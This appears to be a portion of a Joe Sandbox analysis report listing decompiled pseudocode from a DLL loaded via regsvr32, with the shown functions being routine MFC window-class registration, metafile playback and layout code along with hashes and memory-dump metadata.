                                                                                                                				_t122 = E1001E302(__ebx, __edi, __esi, __eflags);
                                                                                                                				_v8 = _t122;
                                                                                                                				_t3 =  &_a4;
                                                                                                                				 *_t3 = _a4 &  !( *(_t122 + 0x18));
                                                                                                                				if( *_t3 == 0) {
                                                                                                                					return 1;
                                                                                                                				}
                                                                                                                				_push(__ebx);
                                                                                                                				_push(__esi);
                                                                                                                				_push(__edi);
                                                                                                                				_t201 = 0;
                                                                                                                				E10049170(0,  &_v56, 0, 0x28);
                                                                                                                				_v52 = DefWindowProcA;
                                                                                                                				_t128 = E1001E302(__ebx, 0, 0, __eflags);
                                                                                                                				__eflags = _a4 & 0x00000001;
                                                                                                                				_v40 =  *((intOrPtr*)(_t128 + 8));
                                                                                                                				_t130 =  *0x100bdcb8; // 0x10003
                                                                                                                				_t187 = 8;
                                                                                                                				_v32 = _t130;
                                                                                                                				_v16 = _t187;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_push( &_v56);
                                                                                                                					_v56 = 0xb;
                                                                                                                					_v20 = "AfxWnd80s";
                                                                                                                					_t183 = L10016FC9(_t187, _t190, 0, 0, __eflags);
                                                                                                                					__eflags = _t183;
                                                                                                                					if(_t183 != 0) {
                                                                                                                						_t201 = 1;
                                                                                                                						__eflags = 1;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000020;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v56 = _v56 | 0x0000008b;
                                                                                                                					_push( &_v56);
                                                                                                                					_v20 = "AfxOleControl80s";
                                                                                                                					_t181 = L10016FC9(_t187, _t190, 0, _t201, __eflags);
                                                                                                                					__eflags = _t181;
                                                                                                                					if(_t181 != 0) {
                                                                                                                						_t201 = _t201 | 0x00000020;
                                                                                                                						__eflags = _t201;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000002;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_push( &_v56);
                                                                                                                					_v56 = 0;
                                                                                                                					_v20 = "AfxControlBar80s";
                                                                                                                					_v28 = 0x10;
                                                                                                                					_t179 = L10016FC9(_t187, _t190, 0, _t201, __eflags);
                                                                                                                					__eflags = _t179;
                                                                                                                					if(_t179 != 0) {
                                                                                                                						_t201 = _t201 | 0x00000002;
                                                                                                                						__eflags = _t201;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000004;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v56 = _t187;
                                                                                                                					_v28 = 0;
                                                                                                                					_t177 = E1001726F(_t190, __eflags,  &_v56, "AfxMDIFrame80s", 0x7a01);
                                                                                                                					__eflags = _t177;
                                                                                                                					if(_t177 != 0) {
                                                                                                                						_t201 = _t201 | 0x00000004;
                                                                                                                						__eflags = _t201;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				__eflags = _a4 & _t187;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v56 = 0xb;
                                                                                                                					_v28 = 6;
                                                                                                                					_t175 = E1001726F(_t190, __eflags,  &_v56, "AfxFrameOrView80s", 0x7a02);
                                                                                                                					__eflags = _t175;
                                                                                                                					if(_t175 != 0) {
                                                                                                                						_t201 = _t201 | _t187;
                                                                                                                						__eflags = _t201;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000010;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0xff;
                                                                                                                					_t201 = _t201 | E1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x3fc0);
                                                                                                                					_t48 =  &_a4;
                                                                                                                					 *_t48 = _a4 & 0xffffc03f;
                                                                                                                					__eflags =  *_t48;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000040;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x10;
                                                                                                                					_t201 = _t201 | E1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x40);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000080;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 2;
                                                                                                                					_t201 = _t201 | E1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x80);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000100;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = _t187;
                                                                                                                					_t201 = _t201 | E1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x100);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000200;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x20;
                                                                                                                					_t201 = _t201 | E1001475B(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000400;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 1;
                                                                                                                					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00000800;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x40;
                                                                                                                					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00001000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 4;
                                                                                                                					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00002000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x80;
                                                                                                                					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00004000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x800;
                                                                                                                					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00008000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x400;
                                                                                                                					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00010000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x200;
                                                                                                                					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00020000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x100;
                                                                                                                					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				__eflags = _a4 & 0x00040000;
                                                                                                                				if(__eflags != 0) {
                                                                                                                					_v12 = 0x8000;
                                                                                                                					_t201 = _t201 | E1001475B(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				_t191 = _v8;
                                                                                                                				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
                                                                                                                				_t139 =  *(_t191 + 0x18);
                                                                                                                				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
                                                                                                                				if((_t139 & 0x00003fc0) == 0x3fc0) {
                                                                                                                					 *(_t191 + 0x18) = _t139 | 0x00000010;
                                                                                                                					_t201 = _t201 | 0x00000010;
                                                                                                                					__eflags = _t201;
                                                                                                                				}
                                                                                                                				asm("sbb eax, eax");
                                                                                                                				_t144 =  ~((_t201 & _a4) - _a4) + 1;
                                                                                                                				__eflags = _t144;
                                                                                                                				return _t144;
                                                                                                                			}



























                                                                                                                0x10017413
                                                                                                                0x1001741f
                                                                                                                0x1001741f
                                                                                                                0x1001741f
                                                                                                                0x10017426
                                                                                                                0x10017429
                                                                                                                0x10017430
                                                                                                                0x10017438
                                                                                                                0x10017438
                                                                                                                0x10017438
                                                                                                                0x1001743f
                                                                                                                0x10017442
                                                                                                                0x10017449
                                                                                                                0x10017455
                                                                                                                0x10017455
                                                                                                                0x10017455
                                                                                                                0x1001745c
                                                                                                                0x1001745f
                                                                                                                0x10017466
                                                                                                                0x10017472
                                                                                                                0x10017472
                                                                                                                0x10017472
                                                                                                                0x10017479
                                                                                                                0x1001747c
                                                                                                                0x10017483
                                                                                                                0x1001748f
                                                                                                                0x1001748f
                                                                                                                0x1001748f
                                                                                                                0x10017496
                                                                                                                0x10017499
                                                                                                                0x100174a0
                                                                                                                0x100174ac
                                                                                                                0x100174ac
                                                                                                                0x100174ac
                                                                                                                0x100174b3
                                                                                                                0x100174b6
                                                                                                                0x100174bd
                                                                                                                0x100174c9
                                                                                                                0x100174c9
                                                                                                                0x100174c9
                                                                                                                0x100174d0
                                                                                                                0x100174d3
                                                                                                                0x100174da
                                                                                                                0x100174e2
                                                                                                                0x100174e2
                                                                                                                0x100174e2
                                                                                                                0x100174e9
                                                                                                                0x100174ec
                                                                                                                0x100174f3
                                                                                                                0x100174fb
                                                                                                                0x100174fb
                                                                                                                0x100174fb
                                                                                                                0x10017502
                                                                                                                0x10017505
                                                                                                                0x1001750c
                                                                                                                0x10017518
                                                                                                                0x10017518
                                                                                                                0x10017518
                                                                                                                0x1001751f
                                                                                                                0x10017522
                                                                                                                0x10017529
                                                                                                                0x10017535
                                                                                                                0x10017535
                                                                                                                0x10017535
                                                                                                                0x1001753c
                                                                                                                0x1001753f
                                                                                                                0x10017546
                                                                                                                0x1001754e
                                                                                                                0x1001754e
                                                                                                                0x1001754e
                                                                                                                0x10017550
                                                                                                                0x10017553
                                                                                                                0x10017556
                                                                                                                0x10017562
                                                                                                                0x10017564
                                                                                                                0x10017569
                                                                                                                0x1001756c
                                                                                                                0x1001756c
                                                                                                                0x1001756c
                                                                                                                0x1001757b
                                                                                                                0x1001757d
                                                                                                                0x1001757d
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset
                                                                                                                • String ID: @$@$AfxControlBar80s$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                • API String ID: 2102423945-872377046
                                                                                                                • Opcode ID: 246c2736f34b9221e7c0ea197a0b0a73a0b258aac16dd4f6392efafb935adb0d
                                                                                                                • Instruction ID: da3380c3b0667d0e64b503f302b748ed86f8a6d1f09ab35432b847b42ad21fda
                                                                                                                • Opcode Fuzzy Hash: 246c2736f34b9221e7c0ea197a0b0a73a0b258aac16dd4f6392efafb935adb0d
                                                                                                                • Instruction Fuzzy Hash: 34812075C00219AADB40CFA4C585BEEBFF8EF04384F118165F919EA191EB74DB85DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 96%
                                                                                                                			E1000D1E8(struct HDC__* _a4, struct tagHANDLETABLE* _a8, void* _a12, int _a16, void* _a20) {
                                                                                                                				void* _v8;
                                                                                                                				void* _v12;
                                                                                                                				char _v20;
                                                                                                                				char _v28;
                                                                                                                				char _v36;
                                                                                                                				char _v44;
                                                                                                                				char _v52;
                                                                                                                				char _v60;
                                                                                                                				char _v68;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				long _t105;
                                                                                                                				void* _t106;
                                                                                                                				void* _t108;
                                                                                                                				void* _t110;
                                                                                                                				void* _t117;
                                                                                                                				void* _t118;
                                                                                                                				signed int _t119;
                                                                                                                				long _t120;
                                                                                                                				long _t122;
                                                                                                                				long _t124;
                                                                                                                				long _t126;
                                                                                                                				long _t128;
                                                                                                                				void* _t134;
                                                                                                                				void* _t136;
                                                                                                                				void* _t138;
                                                                                                                				void* _t140;
                                                                                                                				void* _t144;
                                                                                                                				void _t172;
                                                                                                                				void* _t173;
                                                                                                                				struct tagMETARECORD* _t175;
                                                                                                                				void* _t176;
                                                                                                                
                                                                                                                				_t175 = _a12;
                                                                                                                				_t119 = _t175->rdFunction & 0x0000ffff;
                                                                                                                				_t176 = _t119 - 0x20b;
                                                                                                                				if(_t176 > 0) {
                                                                                                                					_t120 = _t119 - 0x20c;
                                                                                                                					__eflags = _t120;
                                                                                                                					if(_t120 == 0) {
                                                                                                                						 *((intOrPtr*)( *_a20 + 0x48))( &_v68,  *((short*)(_t175 + 8)), _t175->rdParm);
                                                                                                                					} else {
                                                                                                                						_t122 = _t120 - 1;
                                                                                                                						__eflags = _t122;
                                                                                                                						if(_t122 == 0) {
                                                                                                                							 *((intOrPtr*)( *_a20 + 0x38))( &_v60,  *((short*)(_t175 + 8)), _t175->rdParm);
                                                                                                                						} else {
                                                                                                                							_t124 = _t122 - 1;
                                                                                                                							__eflags = _t124;
                                                                                                                							if(_t124 == 0) {
                                                                                                                								 *((intOrPtr*)( *_a20 + 0x40))( &_v52,  *((short*)(_t175 + 8)), _t175->rdParm);
                                                                                                                							} else {
                                                                                                                								_t126 = _t124 - 3;
                                                                                                                								__eflags = _t126;
                                                                                                                								if(_t126 == 0) {
                                                                                                                									 *((intOrPtr*)( *_a20 + 0x3c))( &_v44,  *((short*)(_t175 + 8)), _t175->rdParm);
                                                                                                                								} else {
                                                                                                                									_t128 = _t126 - 0x1ff;
                                                                                                                									__eflags = _t128;
                                                                                                                									if(_t128 == 0) {
                                                                                                                										 *((intOrPtr*)( *_a20 + 0x4c))( &_v36,  *((short*)(_t175 + 0xc)),  *((short*)(_t175 + 0xa)),  *((short*)(_t175 + 8)), _t175->rdParm);
                                                                                                                									} else {
                                                                                                                										__eflags = _t128 == 0;
                                                                                                                										if(_t128 == 0) {
                                                                                                                											 *((intOrPtr*)( *_a20 + 0x44))( &_v28,  *((short*)(_t175 + 0xc)),  *((short*)(_t175 + 0xa)),  *((short*)(_t175 + 8)), _t175->rdParm);
                                                                                                                										} else {
                                                                                                                											goto L27;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					if(_t176 == 0) {
                                                                                                                						E1000C778(_a20,  &_v20,  *((short*)(_t175 + 8)), _t175->rdParm);
                                                                                                                					} else {
                                                                                                                						_t134 = _t119 - 0x1e;
                                                                                                                						if(_t134 == 0) {
                                                                                                                							 *((intOrPtr*)( *_a20 + 0x1c))();
                                                                                                                						} else {
                                                                                                                							_t136 = _t134 - 0xe5;
                                                                                                                							if(_t136 == 0) {
                                                                                                                								 *((intOrPtr*)( *_a20 + 0x34))(_t175->rdParm);
                                                                                                                							} else {
                                                                                                                								_t138 = _t136 - 0x24;
                                                                                                                								if(_t138 == 0) {
                                                                                                                									 *((intOrPtr*)( *_a20 + 0x20))(_t175->rdParm);
                                                                                                                								} else {
                                                                                                                									_t140 = _t138 - 6;
                                                                                                                									if(_t140 == 0) {
                                                                                                                										_t141 = _a8;
                                                                                                                										_t173 = _a8[_t175->rdParm & 0x0000ffff];
                                                                                                                										_a12 = _t173;
                                                                                                                										_t105 = GetObjectType(_t173);
                                                                                                                										__eflags = _t105;
                                                                                                                										if(_t105 != 0) {
                                                                                                                											__eflags = _t105 - 6;
                                                                                                                											if(__eflags != 0) {
                                                                                                                												goto L27;
                                                                                                                											} else {
                                                                                                                												_push(_t173);
                                                                                                                												_t106 = L1000CF95(_t117, _t141, _t173, _t175, __eflags);
                                                                                                                												_t172 =  *_a20;
                                                                                                                												goto L13;
                                                                                                                											}
                                                                                                                										} else {
                                                                                                                											_t108 = GetStockObject(0xd);
                                                                                                                											_t118 = _a20;
                                                                                                                											_v8 = _t108;
                                                                                                                											_a20 = SelectObject( *(_t118 + 4), _t108);
                                                                                                                											_t110 = SelectObject( *(_t118 + 4), _a12);
                                                                                                                											__eflags = _t110 - _v8;
                                                                                                                											_v12 = _t110;
                                                                                                                											if(__eflags != 0) {
                                                                                                                												SelectObject( *(_t118 + 4), _a20);
                                                                                                                												SelectObject( *(_t118 + 4), _v12);
                                                                                                                												goto L27;
                                                                                                                											} else {
                                                                                                                												_push(_a12);
                                                                                                                												_t106 = L1000CF95(_t118, _t141, SelectObject, _t175, __eflags);
                                                                                                                												_t172 =  *_t118;
                                                                                                                												L13:
                                                                                                                												 *((intOrPtr*)(_t172 + 0x28))(_t106);
                                                                                                                											}
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										_t144 = _t140 - 0xd4;
                                                                                                                										if(_t144 == 0) {
                                                                                                                											 *((intOrPtr*)( *_a20 + 0x2c))(_t175->rdParm);
                                                                                                                										} else {
                                                                                                                											if(_t144 != 8) {
                                                                                                                												L27:
                                                                                                                												PlayMetaFileRecord(_a4, _a8, _t175, _a16);
                                                                                                                											} else {
                                                                                                                												 *((intOrPtr*)( *_a20 + 0x30))(_t175->rdParm);
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return 1;
                                                                                                                			}






































                                                                                                                APIs
                                                                                                                • GetObjectType.GDI32 ref: 1000D26D
                                                                                                                • GetStockObject.GDI32(0000000D), ref: 1000D279
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1000D28F
                                                                                                                • SelectObject.GDI32(?,?), ref: 1000D29A
                                                                                                                • PlayMetaFileRecord.GDI32(?,?,?,?), ref: 1000D365
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$FileMetaPlayRecordStockType
                                                                                                                • String ID:
                                                                                                                • API String ID: 4008327421-0
                                                                                                                • Opcode ID: f562a23c37564a38b1fc0ebd0acd21fa1261cdd2b465d0324882b9d721ffca98
                                                                                                                • Instruction ID: a374fe531f4533bf9e2ac478e20ab67a5c21d16fab6e8d4b8b067a8713c70d93
                                                                                                                • Opcode Fuzzy Hash: f562a23c37564a38b1fc0ebd0acd21fa1261cdd2b465d0324882b9d721ffca98
                                                                                                                • Instruction Fuzzy Hash: 34714A79504A15DBDB14EFA4C884CBFBBF5FF88781B10845EF9124A628D734E980DBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1003FC56(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                                                                                                                				struct tagRECT _v20;
                                                                                                                				struct tagRECT _v36;
                                                                                                                				struct HWND__* _v84;
                                                                                                                				unsigned int _v108;
                                                                                                                				intOrPtr _v112;
                                                                                                                				char _v116;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				intOrPtr _t51;
                                                                                                                				intOrPtr* _t53;
                                                                                                                				intOrPtr* _t69;
                                                                                                                				signed int _t72;
                                                                                                                				void* _t74;
                                                                                                                				intOrPtr _t78;
                                                                                                                				intOrPtr _t79;
                                                                                                                				intOrPtr _t95;
                                                                                                                				void* _t100;
                                                                                                                				intOrPtr* _t102;
                                                                                                                
                                                                                                                				_push(0);
                                                                                                                				_t102 = __ecx;
                                                                                                                				_push(0);
                                                                                                                				_push(0x40c);
                                                                                                                				_t74 =  *((intOrPtr*)( *__ecx + 0x110))();
                                                                                                                				_t104 = _t74;
                                                                                                                				_v116 = 0x50;
                                                                                                                				_t100 = _t74;
                                                                                                                				if(_t74 == 0) {
                                                                                                                					L7:
                                                                                                                					SetRectEmpty( &_v20);
                                                                                                                					while(_t74 != 0) {
                                                                                                                						_t74 = _t74 - 1;
                                                                                                                						_v112 = 1;
                                                                                                                						 *((intOrPtr*)( *_t102 + 0x110))(0x41d, _t74,  &_v116);
                                                                                                                						__eflags = _v108 & 0x00000008;
                                                                                                                						if((_v108 & 0x00000008) == 0) {
                                                                                                                							 *((intOrPtr*)( *_t102 + 0x110))(0x409, _t74,  &_v36);
                                                                                                                							UnionRect( &_v20,  &_v20,  &_v36);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if(IsRectEmpty( &_v20) != 0) {
                                                                                                                						_t51 = _v20.bottom;
                                                                                                                						_t78 = _v20.right;
                                                                                                                					} else {
                                                                                                                						SetRectEmpty( &_v36);
                                                                                                                						 *((intOrPtr*)( *_t102 + 0x140))( &_v36, _a12);
                                                                                                                						_t78 = _v20.right + _v36.left - _v36.right;
                                                                                                                						_t51 = _v20.bottom + _v36.top - _v36.bottom;
                                                                                                                					}
                                                                                                                					if(_a12 != 0 || _a8 == 0) {
                                                                                                                						__eflags = _a12;
                                                                                                                						_t95 = _t51 - _v20.top;
                                                                                                                						if(_a12 == 0) {
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						__eflags = _a8;
                                                                                                                						if(_a8 == 0) {
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						_t79 = 0x7fff;
                                                                                                                						goto L18;
                                                                                                                					} else {
                                                                                                                						_t95 = 0x7fff;
                                                                                                                						L17:
                                                                                                                						_t79 = _t78 - _v20.left;
                                                                                                                						L18:
                                                                                                                						_t53 = _a4;
                                                                                                                						 *_t53 = _t79;
                                                                                                                						 *((intOrPtr*)(_t53 + 4)) = _t95;
                                                                                                                						return _t53;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					L1:
                                                                                                                					_t100 = _t100 - 1;
                                                                                                                					_v112 = 0x11;
                                                                                                                					 *((intOrPtr*)( *_t102 + 0x110))(0x41d, _t100,  &_v116);
                                                                                                                					_t69 = E100203C2(0x1009e47c, E10014011(_t102, _t100, _t102, _t104, _v84));
                                                                                                                					if(_t69 == 0) {
                                                                                                                						_t72 = GetWindowLongA(_v84, 0xfffffff0) >> 0x0000001c & 0x00000001;
                                                                                                                						__eflags = _t72;
                                                                                                                					} else {
                                                                                                                						_t72 =  *((intOrPtr*)( *_t69 + 0x154))();
                                                                                                                					}
                                                                                                                					if(_t72 != ( !(_v108 >> 3) & 0x00000001)) {
                                                                                                                						 *((intOrPtr*)( *_t102 + 0x110))(0x423, _t100, _t72);
                                                                                                                					}
                                                                                                                				} while (_t100 != 0);
                                                                                                                				goto L7;
                                                                                                                			}

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Empty$LongUnionWindow
                                                                                                                • String ID: P
                                                                                                                • API String ID: 1811082079-3110715001
                                                                                                                • Opcode ID: 6b72cd354d9265c7ba935c05ee196e7bacef4bb1858a8396bb49631afc64948d
                                                                                                                • Instruction ID: d1836f5a0f382b97b9cbd91a64c48767d3f03db10e2d9acb5cf6244ea132254a
                                                                                                                • Opcode Fuzzy Hash: 6b72cd354d9265c7ba935c05ee196e7bacef4bb1858a8396bb49631afc64948d
                                                                                                                • Instruction Fuzzy Hash: 3E415971A0021AAFDB15CFA5C888EFEB7B9FF48705F15452DE955AB280CB749940CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 42%
                                                                                                                			E1003275C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t76;
                                                                                                                				intOrPtr _t78;
                                                                                                                				intOrPtr _t89;
                                                                                                                				intOrPtr* _t93;
                                                                                                                				intOrPtr* _t96;
                                                                                                                				intOrPtr* _t98;
                                                                                                                				void* _t103;
                                                                                                                				intOrPtr _t120;
                                                                                                                				void* _t122;
                                                                                                                				void* _t123;
                                                                                                                				void* _t124;
                                                                                                                
                                                                                                                				_t116 = __edx;
                                                                                                                				_push(0x6c);
                                                                                                                				E1004764D(0x10090905, __ebx, __edi, __esi);
                                                                                                                				_t122 = __ecx;
                                                                                                                				 *((intOrPtr*)(__ecx + 0x44)) = 1;
                                                                                                                				 *(_t123 - 0x14) = 0;
                                                                                                                				 *(_t123 - 0x10) = 0;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x10)) <= 0) {
                                                                                                                					L18:
                                                                                                                					 *(_t122 + 0x44) =  *(_t122 + 0x44) & 0x00000000;
                                                                                                                					return E10047725(0);
                                                                                                                				} else {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				do {
                                                                                                                					L1:
                                                                                                                					_t108 =  *(_t123 - 0x10) * 0x28;
                                                                                                                					_t76 =  *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x14)) + 0x24 +  *(_t123 - 0x10) * 0x28));
                                                                                                                					if(_t76 == 0) {
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					_t78 =  *((intOrPtr*)(_t76 + 4));
                                                                                                                					 *((intOrPtr*)(_t123 - 0x20)) = _t78;
                                                                                                                					if(_t78 == 0) {
                                                                                                                						goto L17;
                                                                                                                					}
                                                                                                                					 *(_t123 - 0x18) =  *(_t123 - 0x14) << 4;
                                                                                                                					do {
                                                                                                                						_t120 =  *((intOrPtr*)(E10012115(_t123 - 0x20)));
                                                                                                                						 *((intOrPtr*)(_t123 - 0x24)) = 0xfffffffd;
                                                                                                                						E10049170(_t120, _t123 - 0x78, 0, 0x20);
                                                                                                                						_t124 = _t124 + 0xc;
                                                                                                                						E100235FF(_t123 - 0x48);
                                                                                                                						 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
                                                                                                                						_t130 =  *((intOrPtr*)(_t122 + 0x48));
                                                                                                                						if( *((intOrPtr*)(_t122 + 0x48)) == 0) {
                                                                                                                							_t89 =  *((intOrPtr*)(_t122 + 0x40)) +  *(_t123 - 0x18);
                                                                                                                							__eflags = _t89;
                                                                                                                						} else {
